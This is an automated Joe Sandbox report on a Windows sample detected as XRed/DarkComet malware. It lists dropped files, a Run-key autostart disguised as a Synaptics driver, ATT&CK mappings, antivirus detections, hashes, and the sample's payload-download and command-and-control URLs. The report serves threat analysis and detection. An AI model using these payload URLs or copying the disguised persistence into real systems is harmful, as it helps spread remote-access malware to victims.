Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000734000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2701819372.0000000000734000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2183407168.0000000000D12000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155521277.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155297064.0000000000D12000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: dxwsetup.exe, 00000004.00000003.2155521277.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWw)
Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW`
Source: C:\Users\user\Desktop\._cache_file.exe; API call chain: ExitProcess graph end node (graph_2-2861)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\._cache_file.exe; Code function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B
Source: C:\Users\user\Desktop\file.exe; Process created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
Source: C:\Users\user\Desktop\file.exe; Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Users\user\Desktop\._cache_file.exe; Code function: 2_2_0100168B GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,2_2_0100168B
Source: C:\Users\user\Desktop\file.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\._cache_file.exe; Code function: 2_2_01005D22 GetVersionExA,GetSystemMetrics,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,2_2_01005D22

Stealing of Sensitive Information

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 7252, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
Source: Yara match; File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Remote Access Functionality

Source: Yara match; File source: file.exe, type: SAMPLE
Source: Yara match; File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 7252, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
Source: Yara match; File source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic; a number in front of a technique name is the counter shown in the report for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 41 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: 2 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 41 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; 1 Extra Window Memory Injection; RC Scripts; Startup Items
Defense Evasion: 32 Masquerading; 11 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 DLL Side-Loading; 1 File Deletion; 1 Extra Window Memory Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Query Registry; 11 Security Software Discovery; 1 Process Discovery; 11 Virtualization/Sandbox Evasion; 11 Peripheral Device Discovery; 4 File and Directory Discovery; 15 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 34 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1583475; Sample: file.exe; Start date: 02/01/2025; Architecture: WINDOWS; Score: 74 (the rendered graph and its legend are not recoverable from the page text)

Source | Detection | Scanner | Label | Link
file.exe | 92% | ReversingLabs | Win32.Worm.Zorex |
file.exe | 100% | Avira | TR/Dldr.Agent.SH |
file.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
file.exe | 100% | Joe Sandbox ML |  |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Synaptics\RCXE9B.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCXE9B.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\RCXE9B.tmp | 100% | Joe Sandbox ML |  |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |  |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 100% | Joe Sandbox ML |  |
C:\ProgramData\Synaptics\RCXE9B.tmp | 94% | ReversingLabs | Win32.Backdoor.DarkComet |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Worm.Zorex |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | 0% | ReversingLabs |  |
C:\Users\user\Desktop\._cache_file.exe | 0% | ReversingLabs |  |
C:\Users\user\Documents\BJZFPPWAPT\~$cache1 | 94% | ReversingLabs | Win32.Backdoor.DarkComet |
C:\Windows\SysWOW64\directx\websetup\SET1013.tmp | 0% | ReversingLabs |  |
C:\Windows\SysWOW64\directx\websetup\SETFF3.tmp | 0% | ReversingLabs |  |
C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy) | 0% | ReversingLabs |  |
C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy) | 0% | ReversingLabs |  |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://drive.usercontent.go | 0% | Avira URL Cloud | safe |
http://xred.site50.net/syn/Synaptics.rarZ | 100% | Avira URL Cloud | malware |
http://www.betaplace.com. | 0% | Avira URL Cloud | safe |
http://xred.site50.net/syn/SUpdate.iniZ | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dll6 | 100% | Avira URL Cloud | malware |
http://www.betaplace.com | 0% | Avira URL Cloud | safe |
http://www.BetaPlace.comEContinuare | 0% | Avira URL Cloud | safe |
http://www.BetaPlace.com.? | 0% | Avira URL Cloud | safe |
http://www.betaplace.com.DInstalacn | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false |  | high
docs.google.com | 142.250.184.238 | true | false |  | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false |  | high
drive.usercontent.google.com | 142.250.185.97 | true | false |  | high
xred.mooo.com | unknown | unknown | false |  | high

Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false |  | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false |  | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://docs.google.com/~ | Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl= | file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://docs.google.com/google.com/ta | Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | file.exe | false |  | high
https://drive.usercontent.go | Synaptics.exe, 00000003.00000003.2723135790.0000000000784000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978n% | Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://docs.google.com/. | Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://drive.usercontent.google.com/ | Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://xred.site50.net/syn/Synaptics.rar | file.exe | false |  | high
http://xred.site50.net/syn/Synaptics.rarh | file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://docs.google.com/ | Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX | file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | false |  | high
http://www.BetaPlace.com.? | ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SSLLibrary.dll6 | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1: | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false |  | high
http://xred.site50.net/syn/SSLLibrary.dlD | file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | file.exe | false |  | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | ~DF26C05A2AD06F381B.TMP.5.dr | false |  | high
http://www.betaplace.com.DInstalacn | ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SUpdate.iniZ | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.betaplace.com. | ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2045818625.0000000000C84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://xred.site50.net/syn/SUpdate.ini | file.exe | false |  | high
http://www.betaplace.com | dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
http://www.BetaPlace.comEContinuare | ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978W% | Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16 | Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false |  | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978q | Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x | file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://drive.usercontent.google.com/q | Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978t | Synaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.BetaPlace.com | dxwsetup.exe, 00000004.00000000.2043809053.0000000000DAD000.00000002.00000001.01000000.00000007.sdmp | false |  | unknown
http://xred.site50.net/syn/SSLLibrary.dll | file.exe | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.184.238 | docs.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1583475
                                                                                          Start date and time:2025-01-02 20:36:54 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 48s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Run name:Run with higher sleep bypass
                                                                                          Number of analysed new started processes analysed:13
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:file.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal74.rans.troj.expl.winEXE@11/258@4/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 26
                                                                                          • Number of non-executed functions: 40
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.113.194.132, 23.212.89.111, 20.42.72.131, 20.190.160.14, 52.149.20.212, 13.107.246.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, ocsp.digicert.com, login.live.com, download.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, main.dl.ms.akadns.net, officeclient.microsoft.com, download.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdeus00.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: file.exe
Time | Type | Description
20:37:56 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
Match: 69.42.215.252
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
file.exe | malicious | AsyncRAT, XRed, XWorm | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match: s-part-0017.t-0009.t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | XRed | 13.107.246.45
file.exe | malicious | Xmrig | 13.107.246.45
file.exe | malicious | AsyncRAT, XRed, XWorm | 13.107.246.45
https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690 | malicious | Unknown | 13.107.246.45
Match: freedns.afraid.org
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | AsyncRAT, XRed, XWorm | 69.42.215.252
Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | 69.42.215.252
Match: AWKNET-LLCUS
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | XRed | 69.42.215.252
file.exe | malicious | AsyncRAT, XRed, XWorm | 69.42.215.252
Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | 69.42.215.252
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | XRed | 142.250.184.238, 142.250.185.97
file.exe | malicious | AsyncRAT, XRed, XWorm | 142.250.184.238, 142.250.185.97
Match: C:\ProgramData\Synaptics\RCXE9B.tmp
Associated Sample Name / URL | Detection | Threat Name
file.exe | malicious | XRed
file.exe | malicious | XRed
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):118
                                                                                              Entropy (8bit):3.5700810731231707
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXE9B.tmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXE9B.tmp, Author: Joe Security
                                                                                              Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 94%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1059840
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              MD5:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              SHA1:D0572BAD54FACA6AF612763C6835FEB160A3DCD2
                                                                                              SHA-256:43555B4A8BD82ABD7E7B1F279B4F31AFB5A230CE4246BE6FDA4FDD5E7263C780
                                                                                              SHA-512:B767A6F167A0153628AE0BDB468EEF4D4311E48A58FF4774843EE36321C48823A24BE5C9D0D399800A19733A46EAD5109CD54E728E6A260107212647A5F60D9C
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
